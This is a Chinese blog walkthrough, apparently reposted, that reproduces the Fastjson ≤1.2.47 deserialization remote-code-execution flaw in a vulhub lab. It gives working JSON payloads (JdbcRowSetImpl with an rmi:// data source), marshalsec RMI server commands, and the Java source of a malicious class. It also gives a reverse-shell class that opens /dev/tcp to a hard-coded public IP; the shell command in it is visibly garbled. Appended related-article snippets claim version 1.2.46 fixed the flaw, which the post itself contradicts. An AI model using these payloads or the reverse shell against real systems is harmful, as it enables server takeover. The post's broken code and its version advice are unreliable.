fastjson jar包_Fastjson<=1.2.47反序列化漏洞复现

最新推荐文章于 2024-03-27 14:34:46 发布
最新推荐文章于 2024-03-27 14:34:46 发布
阅读量201 收藏 1
点赞数
文章标签: fastjson jar包 fastjson反序列化过滤字段属性

7d66c41bc15fa0a05799650bdaba8d4f.gif

实验环境

攻击机C:Windows 10 企业版 LTSC

靶机A:CentOS8 (公网)

监听主机B:Centos7(公网)

项目地址:

https://github.com/vulhub/vulhub

该篇复现环境是fastjson1.2.47,复现手法同时适用于fastjson1.2.24,payload已在下文提供

c2dcac56439c28f6551790b246c54550.png

基础环境搭建

    在靶机A上安装docker

curl https://download.docker.com/linux/centos/docker-ce.repo -o /etc/yum.repos.d/docker-ce.repoyum install https://download.docker.com/linux/fedora/30/x86_64/stable/Packages/containerd.io-1.2.6-3.3.fc30.x86_64.rpmyum install docker-cesystemctl start docker

    更换镜像源

vi /etc/docker/daemon.json

    修改文件内容,镜像源地址可以用阿里云的镜像地址,百度的镜像源会有一个包下载很慢。自己登陆阿里云获取

{        "registry-mirrors": ["https://xxxxx.mirrors.aliyun.com"]}

340db2e216772e5f55883c21b1a16d65.png

保存退出之后,重新加载配置,重启docker

systemctl daemon-reloadsystemctl restart docker

摘取镜像

docker pull busybox

成功打印出"hello world"说明配置成功

docker run busybox echo “hello world”

到此docker配置完成

接下来部署实验环境

c2dcac56439c28f6551790b246c54550.png

实验环境搭建

项目地址

https://github.com/vulhub/vulhub

下载后上传至靶机A任意目录,进入目录

vulhub-master/fastjson/1.2.47-rce

启动docker编译

docker-compose up -d
3a3a1a81169f3eedcdd324fac3b789f2.png

PS

很多人pip装不上,这里的方法亲测有效;

yum install -y python38wget https://bootstrap.pypa.io/get-pip.pysudo  python3 get-pip.pypip -versionpip install docker-compose

litbaiZhang

5100e2d0cdb3328f6805fd1cc52d3390.png

275bf96e1e2698d60a6b8f796f762552.png

在监听主机B上安装Tomcat,远程加载恶意类。

拉取docker镜像

docker pull rightctrl/tomcat

映射到服务器8080端口

docker run -d --name tomcat -p 8080:8080 rightctrl/tomcat
访问http://ip:8080

e12c3138531dddecd88e7249d7e3541f.png

把编译好的恶意类拷贝进docker环境,具体路径进入docker查找
docker cp TouchFile.class  tomcat:/opt/tomcat/webapps/
TouchFie.class的java源码如下:
import java.lang.Runtime;import java.lang.Process;public class TouchFile {    static {        try {            Runtime rt = Runtime.getRuntime();            String[] commands = {"touch", "/tmp/success"};            Process pc = rt.exec(commands);            pc.waitFor();        } catch (Exception e) {            // do nothing        }    }}
上传成功后确认可以访问TouchFile.class

53a981f6da67cfaf9942e3c35f8d520e.png

继续在监听主机B上使用marshalsec快速开启rmi或ldap服务
marshalsec项目地址
https://github.com/mbechler/marshalsec
使用maven编译jar包
mvn clean package -DskipTests
进入target目录,并开启rmi或者ladp服务
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://恶意类的IP:8080/#TouchFile 8088

ccbcde7942a826d60fd84eca82ca24da.png

c2dcac56439c28f6551790b246c54550.png

复现步骤

攻击机C上直接访问搭好的漏洞环境

75557178594911aee7f1105b1aa3e528.png

payload

//1.2.24以下版本{    "a":{        "@type":"com.sun.rowset.JdbcRowSetImpl",        "dataSourceName":"rmi://ip:8088/TouchFile",        "autoCommit":true    }}//1.2.47以下版本{"a":{        "@type":"java.lang.Class",        "val":"com.sun.rowset.JdbcRowSetImpl"    },    "b":{        "@type":"com.sun.rowset.JdbcRowSetImpl",        "dataSourceName":"rmi://ip:8088/TouchFile",        "autoCommit":true    }}

 发送请求后,rmi服务器收到响应,远程加载恶意类TouchFile.class

ea5f4a0ce638e7668ffba1b66654fd6c.png

可以看到已经成功执行touch /tmp/success

dd8d830fcbce99a6fcb16ea056fafb98.png

同理可反弹shell

反弹shell文件(除了远程加载的恶意类不同,其他操作均相同)

import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader;public class Exploit{    public Exploit() throws Exception {        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/175.24.81.132/9999;cat &5 >&5; done"});        InputStream is = p.getInputStream();        BufferedReader reader = new BufferedReader(new InputStreamReader(is));        String line;        while((line = reader.readLine()) != null) {            System.out.println(line);        }        p.waitFor();        is.close();        reader.close();        p.destroy();    }    public static void main(String[] args) throws Exception {    }}

在监听主机B上同时用NC监听端口

3dd8d4844fcc15c20d889ca30e9783b7.png

成功拿shell

c2dcac56439c28f6551790b246c54550.png

9b1f45970b6dcd528c6867f39b52d5a6.gif 80b8ea8b9235325d52b144e7dae7669e.png

Hi  这里是白泽Sec~

旨在做最纯净的技术公众号

做最敬业的安全技术团队!

欢迎关注我哦~

既然在看了,就点一下吧!!

weixin_39864373
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
fastjson-1.2.47.jar
03-16
fastjson-1.2.47.jar,用于将java转换成json**********
fastjson-1.2.4的jar包(含源码)
11-15
fastjson1.2.4的jar包,java解析json的jar包,方便简单实用!内含源码和jar包哦!
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub靶场)
最新发布
人若无名,便可专心练剑
03-27 1546
Fastjson反序列化漏洞也是一个知名度比较高的Java反序列化漏洞,他是阿里巴巴的开源库,下面我将主要带大家了解Fastjson反序列化漏洞的原理以及相关知识点的内容,然后带师傅们去利用rmi服务去复现这个Fastjson反序列化漏洞!!!
最新版 fastjson-1.2.71.jar
06-15
最新版 fastjson-1.2.71.jar
fastjson1.2.47
11-17
fastjson1.2.47 需要者速
fastjson漏洞 - Fastjson1.2.47反序列化漏洞
HAKUNAMATATATTA的博客
01-06 2284
Fastjson 是阿里巴巴公司开源的一款 JSON 解析器,它可以解析 JSON 格式的字符串,Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 Java Bean。
fastjson-1.2.47官方jar包下载
09-05
阿里巴巴FastJson是一个Json处理工具包,包括“序列化”和“反序列化”两部分,它具备如下特征:速度最快,测试表明,fastjson具有极快的性能,超越任其他的JavaJson
Fastjson 漏洞利用技巧
05-08 2754
每次看到json数据包,都难免会想起Fastjson以及它多个版本存在的漏洞。如何实现自动化检测以及简化攻击步骤,从而提升漏洞发现能力,让你更有效率的Tips,在这里和大家分享下。01、自动化漏洞检测一款基于BurpSuite的被动式FastJson检测插件,这个插件会对BurpSuite传进来的带有json数据的请求包进行检测。Github项目地址:https://gi...
FastJson漏洞工具
dahe
06-15 4901
有的时候,我们在渗透ceshi 1.下载地址 https://github.com/nex121/FastjsonEXP
初识Fastjson漏洞(环境搭建及漏洞复现
合天网安学院
06-29 3096
目前网上的资源整理不是针对入门玩家,都需要一定的java漏洞调试基础,本文从一个简单的FastJson 漏洞开始,搭建漏洞环境,分析漏洞成因,使用条件等。从入门者的角度看懂并复现漏洞触发...
老生常谈的fastjson安全问题,从实战深入反序列化漏洞原理
2201_75353421的博客
06-20 1914
反序列化是java安全er避不开的技能点,也是非常难的一个点。这里我就先从我实战中遇到最多也是自己最熟悉的fastjson开始,这个漏洞老生长谈了,不过只要遇到就真是一个很好的点了。这里我先从效果开始再转战到原理,因为如果不懂代码,上来就分析代码就会让人望而却步。直接从漏洞利用开始,溯源到原理反倒是我这种非安全研究er的最好学习方式。
fastjson-1.2.47及源码、简单示例
08-30
fastjson-1.2.47及源码、简单示例
json处理类fastjson-1.2.2.jar
03-27
该工具又阿里巴巴公司开发封装,用于对json方面数据的处理
fastjson-1.2.7.jar
03-08
fastjson-1.2.7.jar 阿里baba开发的json,很方便的json转换
阿里巴巴(alibaba)fastjson -1.2.45.jar
01-24
1.基本的序列化 String objJson = JSON.toJSONString(Object object); 2反序列化(反序列化就是把JSON格式的字符串转化为Java Bean对象) User user1 = JSON.parseObject(userJson, User.class); List list1 = JSON.parseArray(listJson, Map.class);
jar包资源——fastjson-1.2.47.zip
12-05
博客中提到的资源,不需要不用下载,因为用不到。jar包资源——fastjson-1.2.47.zip
Alibaba Fastjson Jar包.zip
07-07
import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.JSONArray; 导入这些的依赖包
com.alibaba.fastjson 完整jar包,亲测可用
08-24
你一定会感谢我的,因为真的很不错
fastjson反序列化漏洞_Fastjson反序列化漏洞的检测和利用
05-21
Fastjson是一款Java语言编写的高性能JSON处理器,被广泛应用于各种Java应用程序中。然而,Fastjson存在反序列化漏洞,黑客可以利用该漏洞实现远程代码执行,因此该漏洞被广泛利用。 检测Fastjson反序列化漏洞的方法: 1. 扫描源代码,搜索是否存在Fastjson相关的反序列化代码,如果存在,则需要仔细检查反序列化的过程是否安全。 2. 使用工具进行扫描:目前市面上有很多漏洞扫描工具已经支持Fastjson反序列化漏洞的检测,例如:AWVS、Nessus、Burp Suite等。 利用Fastjson反序列化漏洞的方法: 1. 利用Fastjson反序列化漏洞执行远程命令:黑客可以构造一个恶意JSON字符串,通过Fastjson反序列化漏洞实现远程命令执行。 2. 利用Fastjson反序列化漏洞实现文件读取:黑客可以构造一个恶意JSON字符串,通过Fastjson反序列化漏洞实现文件读取操作。 3. 利用Fastjson反序列化漏洞实现反弹Shell:黑客可以构造一个恶意JSON字符串,通过Fastjson反序列化漏洞实现反弹Shell操作。 防范Fastjson反序列化漏洞的方法: 1. 更新Fastjson版本:Fastjson官方在1.2.46版本中修复了反序列化漏洞,建议使用该版本或更高版本。 2. 禁止使用Fastjson反序列化:如果应用程序中不需要使用Fastjson反序列化功能,建议禁止使用该功能,可以使用其他JSON处理器。 3. 输入验证:对所有输入进行校验和过滤,确保输入数据符合预期,避免恶意数据进入系统。 4. 序列化过滤:对敏感数据进行序列化过滤,确保敏感数据不会被序列化。 5. 安全加固:对系统进行安全加固,如限制系统权限、加强访问控制等,避免黑客利用Fastjson反序列化漏洞获取系统权限。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值